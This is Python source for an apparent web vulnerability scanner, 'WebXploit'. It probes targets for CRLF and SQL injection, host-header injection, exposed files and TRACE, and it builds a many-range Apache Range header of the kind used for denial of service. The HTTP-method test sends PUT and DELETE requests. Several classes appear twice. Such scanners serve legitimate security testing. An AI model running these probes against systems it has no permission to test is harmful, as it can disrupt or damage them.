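class Crlf_injection():
    """Probe a target URL with the payload list in Fuzzdatabase/crlf_fuzzer.txt."""

    def __init__(self):
        self.Print = Print()
        self.logger = LoggingManager()
        # Project root: two directory levels above this module.
        self.filepath = os.path.abspath(
            os.path.join(os.path.dirname(__file__), '../..'))

    def test_crlf_injection(self, target):
        """Request ``target`` + each payload and report responses that differ.

        ``target`` is fetched once as a baseline. A payload is reported when
        its response body differs from the baseline and the status code is
        not 400, 403 or 404. Errors raised while requesting are printed and
        written to the module log.

        NOTE(review): a hit only means "the body changed and the request was
        not rejected". The response headers are never inspected, so every
        reported line still has to be confirmed by hand.
        """
        # Read the list up front so the handle is closed before any network
        # traffic starts. The first line of the file is skipped, as before.
        with open(self.filepath + '/Fuzzdatabase/crlf_fuzzer.txt', 'r') as fh:
            payloads = [line.rstrip("\n") for line in fh.readlines()[1:]]

        # The original tested target[:-1], i.e. the character before the last
        # one, so "http://host" got no slash and "http://host/" got a second.
        if not target.endswith('/'):
            target += "/"

        try:
            baseline = requests.get(target)
            for payload in payloads:
                if not payload:
                    # A blank line would just repeat the baseline request.
                    continue
                resp = requests.get(target + payload)
                if resp.text == baseline.text:
                    continue
                status = resp.status_code
                if status not in (400, 403, 404):
                    poc = "POC: " + target + payload
                    # The original passed an undefined name ``data`` here; the
                    # NameError was swallowed below and no hit was ever shown.
                    self.Print.printer(3, "CRLF header Injection", None,
                                       status, poc)
        except Exception as e:
            # Implicit concatenation instead of a backslash continuation, which
            # embedded the source indentation in the printed message.
            print("Error occured while checking for crlf injection. "
                  "Check module log for details")
            self.logger.module_log(e)
        return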
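class Crlf_injection():
    """Probe a target URL with the payload list in Fuzzdatabase/crlf_fuzzer.txt."""

    def __init__(self):
        self.Print = Print()
        self.logger = LoggingManager()
        # Project root: two directory levels above this module.
        self.filepath = os.path.abspath(
            os.path.join(os.path.dirname(__file__), '../..'))

    def test_crlf_injection(self, target):
        """Request ``target`` + each payload and report responses that differ.

        ``target`` is fetched once as a baseline. A payload is reported when
        its response body differs from the baseline and the status code is
        not 400, 403 or 404. Errors raised while requesting are printed and
        written to the module log.

        NOTE(review): a hit only means "the body changed and the request was
        not rejected". The response headers are never inspected, so every
        reported line still has to be confirmed by hand.
        """
        # Read the list up front so the handle is closed before any network
        # traffic starts. The first line of the file is skipped, as before.
        with open(self.filepath + '/Fuzzdatabase/crlf_fuzzer.txt', 'r') as fh:
            payloads = [line.rstrip("\n") for line in fh.readlines()[1:]]

        # The original tested target[:-1], i.e. the character before the last
        # one, so "http://host" got no slash and "http://host/" got a second.
        if not target.endswith('/'):
            target += "/"

        try:
            baseline = requests.get(target)
            for payload in payloads:
                if not payload:
                    # A blank line would just repeat the baseline request.
                    continue
                resp = requests.get(target + payload)
                if resp.text == baseline.text:
                    continue
                status = resp.status_code
                if status not in (400, 403, 404):
                    poc = "POC: " + target + payload
                    # The original passed an undefined name ``data`` here; the
                    # NameError was swallowed below and no hit was ever shown.
                    self.Print.printer(3, "CRLF header Injection", None,
                                       status, poc)
        except Exception as e:
            # Implicit concatenation instead of a backslash continuation, which
            # embedded the source indentation in the printed message.
            print("Error occured while checking for crlf injection. "
                  "Check module log for details")
            self.logger.module_log(e)
        return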
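class Apache2_tests():
    """Apache checks: Range-header response timing and mod_negotiation."""

    def __init__(self):
        self.logger = LoggingManager()
        self.Print = Print()

    def currentTime(self):
        """Return the current wall-clock time in whole milliseconds."""
        return int(round(time.time() * 1000))

    def execute_all_func(self, target):
        """Run both checks against ``target``."""
        self.rangeInjection(target)
        self.mod_negotiation(target)

    @staticmethod
    def _range_header():
        """Build the Range value the original spelled out as one long literal.

        The literal was "bytes=0-" followed by "5-0", "5-1", ... "5-1299".
        """
        return "bytes=0-," + ",".join("5-%d" % end for end in range(1300))

    def _mean_response_ms(self, target, headers=None, samples=5):
        """Return the mean duration in milliseconds of ``samples`` GETs."""
        total = 0.0
        for _ in range(samples):
            # perf_counter is monotonic, so a clock adjustment during the
            # measurement cannot skew or negate an interval.
            started = time.perf_counter()
            requests.get(target, headers=headers)
            total += (time.perf_counter() - started) * 1000.0
        return total / samples

    def rangeInjection(self, target):
        """Compare response times with and without the many-range header.

        Five plain GETs and five GETs carrying the Range header are timed.
        The check reports when the mean with the header is more than five
        times the plain mean.

        NOTE(review): five samples per side is a small window. Network
        jitter or caching can move the ratio either way, so a hit is a lead
        to confirm against the server's version and configuration, not a
        verdict.
        """
        headers = {
            'X-Forwarded-Host': "www.google.com",
            'Accept-Encoding': 'gzip , deflate',
            'Connection': 'keep-alive',
            'Range': self._range_header(),
        }

        # The original "average" was ``timer + avgTime / 2``, which adds half
        # the running value to each sample rather than averaging them.
        realTime = self._mean_response_ms(target)
        avgTime = self._mean_response_ms(target, headers=headers)

        # Guard the division: a baseline that measures as zero would
        # otherwise raise ZeroDivisionError.
        if realTime > 0 and (avgTime / realTime) > 5:
            self.Print.printer(2, "Apache2 Range Header DOS: ", None)

    def mod_negotiation(self, target):
        """Request ``target``/index with an unknown Accept type.

        A 406 response is reported together with its Alternates header.
        """
        headers = {'Accept': 'webxploiter/test'}
        req = requests.get(target + "/index", headers=headers)
        if req.status_code == 406:
            # .get(): a 406 without an Alternates header used to raise
            # KeyError here.
            self.Print.printer(2, "Apache Mod Negotiation vulnerability",
                               req.headers.get('alternates'),
                               req.status_code)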
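class Apache2_tests:
    """Apache checks: Range-header response timing and mod_negotiation."""

    def __init__(self):
        self.logger = LoggingManager()
        self.Print = Print()

    def currentTime(self):
        """Return the current wall-clock time in whole milliseconds."""
        return int(round(time.time() * 1000))

    def execute_all_func(self, target):
        """Run both checks against ``target``."""
        self.rangeInjection(target)
        self.mod_negotiation(target)

    @staticmethod
    def _range_header():
        """Build the Range value the original spelled out as one long literal.

        The literal was "bytes=0-" followed by "5-0", "5-1", ... "5-1299".
        """
        return "bytes=0-," + ",".join("5-%d" % end for end in range(1300))

    def _mean_response_ms(self, target, headers=None, samples=5):
        """Return the mean duration in milliseconds of ``samples`` GETs."""
        total = 0.0
        for _ in range(samples):
            # perf_counter is monotonic, so a clock adjustment during the
            # measurement cannot skew or negate an interval.
            started = time.perf_counter()
            requests.get(target, headers=headers)
            total += (time.perf_counter() - started) * 1000.0
        return total / samples

    def rangeInjection(self, target):
        """Compare response times with and without the many-range header.

        Five plain GETs and five GETs carrying the Range header are timed.
        The check reports when the mean with the header is more than five
        times the plain mean.

        NOTE(review): five samples per side is a small window. Network
        jitter or caching can move the ratio either way, so a hit is a lead
        to confirm against the server's version and configuration, not a
        verdict.
        """
        headers = {
            "X-Forwarded-Host": "www.google.com",
            "Accept-Encoding": "gzip , deflate",
            "Connection": "keep-alive",
            "Range": self._range_header(),
        }

        # The original "average" was ``timer + avgTime / 2``, which adds half
        # the running value to each sample rather than averaging them.
        realTime = self._mean_response_ms(target)
        avgTime = self._mean_response_ms(target, headers=headers)

        # Guard the division: a baseline that measures as zero would
        # otherwise raise ZeroDivisionError.
        if realTime > 0 and (avgTime / realTime) > 5:
            self.Print.printer(2, "Apache2 Range Header DOS: ", None)

    def mod_negotiation(self, target):
        """Request ``target``/index with an unknown Accept type.

        A 406 response is reported together with its Alternates header.
        """
        headers = {"Accept": "webxploiter/test"}
        req = requests.get(target + "/index", headers=headers)
        if req.status_code == 406:
            # .get(): a 406 without an Alternates header used to raise
            # KeyError here.
            self.Print.printer(2, "Apache Mod Negotiation vulnerability",
                               req.headers.get("alternates"),
                               req.status_code)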
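class Sql_injection():
    """Error-based SQL injection probes via cookies and the User-Agent header.

    NOTE(review): detection is a substring match on three MySQL error
    phrases. A page that legitimately contains one of them (documentation, a
    forum post) is reported for every payload, and other database engines
    are not covered, so hits need manual confirmation.
    """

    # Substrings of MySQL error text looked for in response bodies.
    _ERROR_SIGNATURES = ("MySQL server version", "have an error", "SQL syntax")

    def __init__(self):
        self.Print = Print()
        self.logger = LoggingManager()
        # Project root: two directory levels above this module.
        self.filepath = os.path.abspath(
            os.path.join(os.path.dirname(__file__), '../..'))

    def execute_all_func(self, target):
        """Run both probes; a failure in one does not stop the other."""
        try:
            self.check_cookies(target)
        except Exception as e:
            print("Error while checking cookies.Check module log for details")
            self.logger.module_log(e)
        try:
            self.check_user_agent(target)
        except Exception as e:
            print(
                "Error while checking user agent.Check module log for details."
            )
            self.logger.module_log(e)
        return

    def _load_payloads(self):
        """Return the non-empty lines of Fuzzdatabase/error_sql.txt."""
        # ``with`` closes the handle; the original left it open.
        with open(self.filepath + '/Fuzzdatabase/error_sql.txt', 'r') as fh:
            lines = (line.strip("\n") for line in fh)
            return [line for line in lines if line]

    def _has_sql_error(self, body):
        """Return True when any error signature occurs in ``body``."""
        return any(sig in body for sig in self._ERROR_SIGNATURES)

    def check_cookies(self, target):
        """Append each payload to each cookie in turn and look for SQL errors.

        The cookies are those the target sets on an initial GET.
        """
        session = requests.Session()
        session.get(target)
        baseline = session.cookies.get_dict()
        for payload in self._load_payloads():
            for name, value in baseline.items():
                # Work on a copy. The original did ``cookie.value += i`` on
                # the session jar, so every payload was stacked on top of all
                # earlier ones and the reported PoC was not the tested value.
                probe = dict(baseline)
                probe[name] = value + payload
                r = requests.get(target, cookies=probe)
                # One report per response, however many signatures match.
                if self._has_sql_error(r.text):
                    poc = "POC: " + name + ": " + probe[name]
                    # Report the probe's own status, not the baseline's.
                    self.Print.printer(3, "Error Based SQLi(Cookie Based)",
                                       None, r.status_code, poc)
        return

    def check_user_agent(self, target):
        """Append each payload to the User-Agent and look for SQL errors."""
        # The original concatenation dropped the space in "Linux x86_64".
        base_agent = ('Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) '
                      'Gecko/20100101 Firefox/39.0')
        for payload in self._load_payloads():
            # Payloads arrive without their trailing newline. The original
            # left it in the header value, which the HTTP client rejects.
            # requests also returns the body of 5xx responses, where database
            # error pages commonly appear; urlopen raised on those instead.
            agent = base_agent + payload
            resp = requests.get(target, headers={'User-agent': agent})
            if self._has_sql_error(resp.text):
                poc = "POC: User-agent: " + agent
                self.Print.printer(3, "Error Based SQLi(User Agent)", None,
                                   resp.status_code, poc)
        return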
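class Info_disclosure:
    """Look for exposed well-known files and a private IP in a redirect."""

    def __init__(self):
        self.Print = Print()

    @staticmethod
    def _private_ip_from_location(location):
        """Return the host of ``location`` if it is a private IP literal.

        Returns None for hostnames, public addresses and relative URLs.
        """
        import ipaddress  # local import: the file's import block is not in view

        host = location.split("://", 1)[-1].split("/", 1)[0]
        host = host.rsplit("@", 1)[-1]  # drop any userinfo
        if host.startswith("["):
            host = host[1:].split("]", 1)[0]  # bracketed IPv6 literal
        else:
            host = host.split(":", 1)[0]  # drop any port
        try:
            address = ipaddress.ip_address(host)
        except ValueError:
            return None
        return host if address.is_private else None

    def check(self, target):
        """Report exposed files under ``target`` and private-IP redirects.

        Each path is requested once and reported only on a 200 response.

        NOTE(review): redirects are followed, so a site that answers
        unknown paths with a 200 page still produces hits. Compare the body
        with a known-missing path before treating a hit as exposure.
        """
        # (path, printer level, title, include the body in the report)
        probes = (
            ("/robots.txt", 0, "Robots.txt analysis: ", True),
            ("/server-status", 1, "server-status analysis: ", False),
            ("/.svn/entries", 1, "Svn entries analysis: ", False),
            ("/.htaccess", 1, ".htaccess analysis: ", False),
        )
        for path, level, title, show_body in probes:
            # The original fetched every path twice and reported anything
            # that was not a 404. A 401 or 403 means access is refused, so it
            # is no longer reported as disclosure.
            resp = requests.get(target + path)
            if resp.status_code == 200:
                body = resp.text if show_body else None
                self.Print.printer(level, title, body, resp.status_code)

        pieces = target.split('/')
        if len(pieces) < 3:
            # No "scheme://host" prefix, so there is no host to connect to.
            return
        conn = httplib.HTTPSConnection(pieces[2])
        # Set HTTP/1.0 on this connection only. The original assigned these
        # on the HTTPSConnection class, changing every later connection made
        # in the same process.
        conn._http_vsn = 10
        conn._http_vsn_str = 'HTTP/1.0'
        try:
            conn.request("GET", "/")
            location = conn.getresponse().getheader('Location')
            # The original used str.strip('https://'), which strips a set of
            # characters rather than a prefix, and then flagged any Location
            # holding two dots and a digit. Parse the host and test it.
            if location and self._private_ip_from_location(location):
                self.Print.printer(2, "Internal IP disclosure", location)
        except Exception:
            # Best effort, as in the original: a target that does not answer
            # on HTTPS simply yields no finding.
            pass
        finally:
            conn.close()

    def hasNumbers(self, inputString):
        """Return True if ``inputString`` contains at least one digit."""
        return any(char.isdigit() for char in inputString)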
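class Info_disclosure:
    """Look for exposed well-known files and a private IP in a redirect."""

    def __init__(self):
        self.Print = Print()

    @staticmethod
    def _private_ip_from_location(location):
        """Return the host of ``location`` if it is a private IP literal.

        Returns None for hostnames, public addresses and relative URLs.
        """
        import ipaddress  # local import: the file's import block is not in view

        host = location.split("://", 1)[-1].split("/", 1)[0]
        host = host.rsplit("@", 1)[-1]  # drop any userinfo
        if host.startswith("["):
            host = host[1:].split("]", 1)[0]  # bracketed IPv6 literal
        else:
            host = host.split(":", 1)[0]  # drop any port
        try:
            address = ipaddress.ip_address(host)
        except ValueError:
            return None
        return host if address.is_private else None

    def check(self, target):
        """Report exposed files under ``target`` and private-IP redirects.

        Each path is requested once and reported only on a 200 response.

        NOTE(review): redirects are followed, so a site that answers
        unknown paths with a 200 page still produces hits. Compare the body
        with a known-missing path before treating a hit as exposure.
        """
        # (path, printer level, title, include the body in the report)
        probes = (
            ("/robots.txt", 0, "Robots.txt analysis: ", True),
            ("/server-status", 1, "server-status analysis: ", False),
            ("/.svn/entries", 1, "Svn entries analysis: ", False),
            ("/.htaccess", 1, ".htaccess analysis: ", False),
        )
        for path, level, title, show_body in probes:
            # The original fetched every path twice and reported anything
            # that was not a 404. A 401 or 403 means access is refused, so it
            # is no longer reported as disclosure.
            resp = requests.get(target + path)
            if resp.status_code == 200:
                body = resp.text if show_body else None
                self.Print.printer(level, title, body, resp.status_code)

        pieces = target.split('/')
        if len(pieces) < 3:
            # No "scheme://host" prefix, so there is no host to connect to.
            return
        conn = httplib.HTTPSConnection(pieces[2])
        # Set HTTP/1.0 on this connection only. The original assigned these
        # on the HTTPSConnection class, changing every later connection made
        # in the same process.
        conn._http_vsn = 10
        conn._http_vsn_str = 'HTTP/1.0'
        try:
            conn.request("GET", "/")
            location = conn.getresponse().getheader('Location')
            # The original used str.strip('https://'), which strips a set of
            # characters rather than a prefix, and then flagged any Location
            # holding two dots and a digit. Parse the host and test it.
            if location and self._private_ip_from_location(location):
                self.Print.printer(2, "Internal IP disclosure", location)
        except Exception:
            # Best effort, as in the original: a target that does not answer
            # on HTTPS simply yields no finding.
            pass
        finally:
            conn.close()

    def hasNumbers(self, inputString):
        """Return True if ``inputString`` contains at least one digit."""
        return any(char.isdigit() for char in inputString)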
class WebXploit():
    """Front end that owns the recon and vulnerability-check helpers."""

    def __init__(self):
        # Target details; filled in by parse_target().
        self.target_url = self.target_port = self.target_host = ""
        self.logger = logger

        # Recon helpers.
        self.recon_headers = Headers()
        self.recon_cookies = Cookies()
        self.recon_methods = HTTPMethods()
        self.recon_others = Others()

        # Vulnerability checks.
        self.sql = Sql_injection()
        self.crlf = Crlf_injection()
        self.host = Host_injection()
        self.apache = Apache2_tests()
        self.wordpress = Wordpress()

        self.Print = Print()

    def parse_target(self, target):
        """Store ``target`` and derive ``scheme://netloc`` and port from it.

        Any exception raised while parsing is sent to the error log.
        """
        try:
            self.target_url = target
            parts = urlparse(target)
            self.target_host = "://".join((parts.scheme, parts.netloc))
            print("Target{}".format(self.target_host))
            self.target_port = parts.port
        except Exception as err:
            self.logger.error_log(err)
        # NOTE(review): the indentation of the source was lost; this call is
        # assumed to follow the try/except rather than sit inside the handler.
        self.Print.printer(None, self.target_url, None)

    def launch(self):
        """Print the banner by running the external ``toilet`` program."""
        # The command is a fixed string; no caller-supplied text reaches the
        # shell.
        os.system("toilet -F metal WebXploit - Recon")

    def get_headers(self, target):
        """Run the header recon."""
        # NOTE(review): ``target`` is ignored here; the stored target_url is
        # used instead, unlike the sibling methods. Confirm this is intended.
        self.recon_headers.execute_all_func(self.target_url)

    def get_cookies(self, target):
        """Run the cookie recon against ``target``."""
        self.recon_cookies.execute_all_func(target)

    def execute_random_vulns(self, target):
        """Run the miscellaneous checks against ``target``."""
        self.recon_others.execute_all_func(target)

    def get_HTTP_methods(self, target):
        """Run the HTTP method test against ``target``."""
        self.recon_methods.test_allowed_methods(target)
class WebXploit():
    """Front end that owns the recon and vulnerability-check helpers."""

    def __init__(self):
        # Target details; filled in by parse_target().
        self.target_url = self.target_port = self.target_host = ""
        self.logger = logger

        # Recon helpers.
        self.recon_headers = Headers()
        self.recon_cookies = Cookies()
        self.recon_methods = HTTPMethods()
        self.recon_others = Others()

        # Vulnerability checks.
        self.sql = Sql_injection()
        self.crlf = Crlf_injection()
        self.host = Host_injection()
        self.apache = Apache2_tests()
        self.wordpress = Wordpress()

        self.Print = Print()

    def parse_target(self, target):
        """Store ``target`` and derive ``scheme://netloc`` and port from it.

        Any exception raised while parsing is sent to the error log.
        """
        try:
            self.target_url = target
            parts = urlparse(target)
            self.target_host = "://".join((parts.scheme, parts.netloc))
            print("Target{}".format(self.target_host))
            self.target_port = parts.port
        except Exception as err:
            self.logger.error_log(err)
        # NOTE(review): the indentation of the source was lost; this call is
        # assumed to follow the try/except rather than sit inside the handler.
        self.Print.printer(None, self.target_url, None)

    def launch(self):
        """Print the banner by running the external ``toilet`` program."""
        # The command is a fixed string; no caller-supplied text reaches the
        # shell.
        os.system("toilet -F metal WebXploit - Recon")

    def get_headers(self, target):
        """Run the header recon."""
        # NOTE(review): ``target`` is ignored here; the stored target_url is
        # used instead, unlike the sibling methods. Confirm this is intended.
        self.recon_headers.execute_all_func(self.target_url)

    def get_cookies(self, target):
        """Run the cookie recon against ``target``."""
        self.recon_cookies.execute_all_func(target)

    def execute_random_vulns(self, target):
        """Run the miscellaneous checks against ``target``."""
        self.recon_others.execute_all_func(target)

    def get_HTTP_methods(self, target):
        """Run the HTTP method test against ``target``."""
        self.recon_methods.test_allowed_methods(target)
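class HTTPMethods():
    """Send one request per HTTP verb and print how the target answers."""

    def __init__(self):
        self.Print = Print()
        self.logger = LoggingManager()
        self.verbs = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE']

    @staticmethod
    def _is_trace_echo(status_code, body):
        """Return True when a TRACE response echoes the request line."""
        return status_code == 200 and body.lstrip().startswith("TRACE ")

    def test_allowed_methods(self, target):
        """Request ``target`` with every verb in ``self.verbs``.

        The status line for each verb is printed, and an echoed TRACE
        request is reported. Request errors are written to the recon log.

        NOTE(review): PUT and DELETE are sent to the target URL itself. A
        server that honours them will modify or remove that resource, so on
        anything that matters prefer reading the Allow header of the OPTIONS
        response.
        """
        for verb in self.verbs:
            try:
                req = requests.request(verb, target)
                print(verb, req.status_code, req.reason)
                # The original looked for the literal 'TRACE / HTTP', which
                # only matches when the target path is "/" and also matches a
                # page that merely quotes that text. Match the echoed request
                # line at the start of a 200 body instead.
                if verb == 'TRACE' and self._is_trace_echo(req.status_code,
                                                           req.text):
                    self.Print.printer(1, "Cross Site Tracing found", None)
            except requests.exceptions.ConnectionError as e:
                print("CONNECT :: Connection error occured. Retry using https")
                self.logger.recon_log(e)
            except Exception as e:
                self.logger.recon_log(e)
                print("Error while testing allowed methords. Check recon log")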
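class Cookies():
    """Collect the cookies a target sets and flag values that decode as Base64.

    NOTE(review): decoded cookie values are printed in clear and may hold
    session data, so the report output should be handled accordingly. Short
    plain values that happen to be valid Base64 are also reported; read the
    decoded text before drawing conclusions.
    """

    def __init__(self):
        # Empty until get_cookies() stores (name, value) pairs; iterating the
        # initial "" yields nothing.
        self.cookies = ""
        self.Print = Print()
        self.logger = LoggingManager()

    def execute_all_func(self, target):
        """Fetch the cookies, then run the Base64 check on them."""
        self.get_cookies(target)
        self.base64_check(target)

    def get_cookies(self, target):
        """GET ``target``, store its cookies and print them one per line."""
        try:
            req = requests.get(target)
            self.cookies = req.cookies.items()
        except Exception as e:
            print("Error occured while accessing cookies. Check recon log")
            self.logger.recon_log(e)

        # One cookie per line; the original ran all of them together.
        data = "".join(
            name + ": ".rjust(25 - len(name)) + value + "\n"
            for name, value in self.cookies)
        self.Print.printer(0, "Cookies: ", data)

    @staticmethod
    def _decode_base64(value):
        """Return ``value`` decoded from Base64, or None if it is not Base64.

        A percent-encoded ``%3D`` is treated as ``=`` padding.
        """
        raw = value.replace("%3D", "=")
        if not raw:
            return None
        try:
            # base64.decodestring no longer exists in Python 3.9+, and its
            # lenient mode silently skipped non-alphabet characters, so nearly
            # any value "decoded". validate=True rejects those.
            decoded = base64.b64decode(raw.encode("ascii"), validate=True)
        except (binascii.Error, UnicodeError):
            # UnicodeError covers non-ASCII values, which are not Base64.
            return None
        return decoded.decode("cp437")

    def base64_check(self, target):
        """Report every stored cookie whose value decodes as Base64."""
        for name, value in self.cookies:
            flag = self._decode_base64(value)
            if flag is None:
                continue
            data = name + ": ".rjust(25 - len(name)) + flag
            self.Print.printer(0, "Base64 Encoded Cookies: (Attention!)", data)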
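class Host_injection():
    """Check whether a redirect reflects a caller-supplied host header."""

    def __init__(self):
        self.logger = LoggingManager()
        self.Print = Print()

    def host_header_inj(self, target):
        """Send ``target`` a foreign Host, then a foreign X-Forwarded-Host.

        A redirect whose Location contains the supplied host is reported.
        Redirects are not followed.

        NOTE(review): the match is a substring test. A target that already
        redirects to a google.com URL for its own reasons (for example a
        sign-in flow) is reported as well.
        """
        check_host = "google.com"
        probes = (
            {'Host': 'www.google.com'},
            {'X-Forwarded-Host': 'www.google.com'},
        )
        try:
            for probe in probes:
                req = requests.get(target, headers=probe,
                                   allow_redirects=False)
                # 303, 307 and 308 carry a Location header too; the original
                # tested 301 and 302 only.
                if req.status_code in (301, 302, 303, 307, 308):
                    # .get(): a redirect without Location used to raise
                    # KeyError and abort the second probe.
                    if check_host in req.headers.get('Location', ''):
                        self.Print.printer(1, "Host Header injection", target,
                                           req.status_code)
        # The handlers below used to read req.status_code. When the first
        # request is the one that fails, ``req`` is unbound and the handler
        # itself raised. No response exists at that point, so pass None.
        except SSLError:
            self.Print.printer(-1,
                               "Host Header injection: Manual check needed",
                               target, None)
        except ConnectionError:
            self.Print.printer(-1, "Host Header injection: ConnectionError",
                               target, None)
        except Exception as e:
            self.logger.module_log(e)
            # Implicit concatenation instead of a backslash continuation, which
            # embedded the source indentation in the printed message.
            print("Error occured while checking host header injection. "
                  "Check module log for details")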
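class Headers():
    """Print a target's response headers and review its security headers."""

    def __init__(self):
        self.Print = Print()
        self.logger = LoggingManager()

    def execute_all_func(self, target):
        """Print the headers, then run the security-header review."""
        self.get_headers(target)
        self.check_headers(target)

    def get_headers(self, target):
        """HEAD ``target`` and print every response header, one per line.

        Exits the process if the request cannot be made.
        """
        try:
            req = requests.head(target)
        except requests.exceptions.MissingSchema as e:
            print("Non valid URL. Please specify a valid URL.")
            self.logger.error_log(e)
            # Same effect as the original exit(), without relying on the
            # helper that the site module injects.
            raise SystemExit
        except Exception as e:
            print("Error occured while accessing headers.Check recon log")
            self.logger.recon_log(e)
            raise SystemExit

        data = "".join(
            name + ": ".rjust(50 - len(name)) + value + "\n"
            for name, value in req.headers.items())
        self.Print.printer(0, "Response Headers: ", data)

    @staticmethod
    def _header_findings(headers):
        """Return the (message, value) pairs check_headers() prints.

        ``headers`` is any mapping with ``.get``.

        NOTE(review): X-XSS-Protection is a legacy header that current
        browsers no longer act on, so its absence is weak evidence and
        Content-Security-Policy is the control to review. Browsers also
        ignore Strict-Transport-Security on plain-HTTP responses, so the
        HSTS line only means something for an https target.
        """
        findings = []

        xss = headers.get("X-XSS-Protection")
        if xss is None:
            findings.append(
                ("X-XSS-Protection not set, XSS may be possible", None))
        # Compare without spaces or case so "1;mode=block" is not flagged.
        elif xss.replace(" ", "").lower() != "1;mode=block":
            findings.append(
                ("X-XSS-Protection not set properly, XSS may be possible:",
                 xss))

        nosniff = headers.get("X-Content-Type-Options")
        if nosniff is None:
            findings.append(("X-Content-Type-Options not set", None))
        elif nosniff.strip().lower() != "nosniff":
            findings.append(
                ("X-Content-Type-Options not set properly:", nosniff))

        if headers.get("Strict-Transport-Security") is None:
            findings.append(
                ("HSTS header not set, MITM attacks may be possible", None))

        csp = headers.get("Content-Security-Policy")
        if csp is None:
            findings.append(("Content-Security-Policy missing", None))
        else:
            findings.append(("Content-Security-Policy set: ", csp))
        return findings

    def check_headers(self, target):
        """HEAD ``target`` and print one line per security-header finding."""
        req = requests.head(target)
        print("\n")
        self.Print.printer(0, "Response header Analysis: ", None)
        # Explicit lookups replace four bare ``except:`` blocks. Those also
        # swallowed KeyboardInterrupt and any error raised by the printer.
        for message, value in self._header_findings(req.headers):
            self.Print.printer(0, message, value)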
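class Headers:
    """Print a target's response headers and review its security headers."""

    def __init__(self):
        self.Print = Print()
        self.logger = LoggingManager()

    def execute_all_func(self, target):
        """Print the headers, then run the security-header review."""
        self.get_headers(target)
        self.check_headers(target)

    def get_headers(self, target):
        """HEAD ``target`` and print every response header, one per line.

        Exits the process if the request cannot be made.
        """
        try:
            req = requests.head(target)
        except requests.exceptions.MissingSchema as e:
            print("Non valid URL. Please specify a valid URL.")
            self.logger.error_log(e)
            # Same effect as the original exit(), without relying on the
            # helper that the site module injects.
            raise SystemExit
        except Exception as e:
            print("Error occured while accessing headers.Check recon log")
            self.logger.recon_log(e)
            raise SystemExit

        data = "".join(
            name + ": ".rjust(50 - len(name)) + value + "\n"
            for name, value in req.headers.items())
        self.Print.printer(0, "Response Headers: ", data)

    @staticmethod
    def _header_findings(headers):
        """Return the (message, value) pairs check_headers() prints.

        ``headers`` is any mapping with ``.get``.

        NOTE(review): X-XSS-Protection is a legacy header that current
        browsers no longer act on, so its absence is weak evidence and
        Content-Security-Policy is the control to review. Browsers also
        ignore Strict-Transport-Security on plain-HTTP responses, so the
        HSTS line only means something for an https target.
        """
        findings = []

        xss = headers.get("X-XSS-Protection")
        if xss is None:
            findings.append(
                ("X-XSS-Protection not set, XSS may be possible", None))
        # Compare without spaces or case so "1;mode=block" is not flagged.
        elif xss.replace(" ", "").lower() != "1;mode=block":
            findings.append(
                ("X-XSS-Protection not set properly, XSS may be possible:",
                 xss))

        nosniff = headers.get("X-Content-Type-Options")
        if nosniff is None:
            findings.append(("X-Content-Type-Options not set", None))
        elif nosniff.strip().lower() != "nosniff":
            findings.append(
                ("X-Content-Type-Options not set properly:", nosniff))

        if headers.get("Strict-Transport-Security") is None:
            findings.append(
                ("HSTS header not set, MITM attacks may be possible", None))

        csp = headers.get("Content-Security-Policy")
        if csp is None:
            findings.append(("Content-Security-Policy missing", None))
        else:
            findings.append(("Content-Security-Policy set: ", csp))
        return findings

    def check_headers(self, target):
        """HEAD ``target`` and print one line per security-header finding."""
        req = requests.head(target)
        print("\n")
        self.Print.printer(0, "Response header Analysis: ", None)
        # Explicit lookups replace four bare ``except:`` blocks. Those also
        # swallowed KeyboardInterrupt and any error raised by the printer.
        for message, value in self._header_findings(req.headers):
            self.Print.printer(0, message, value)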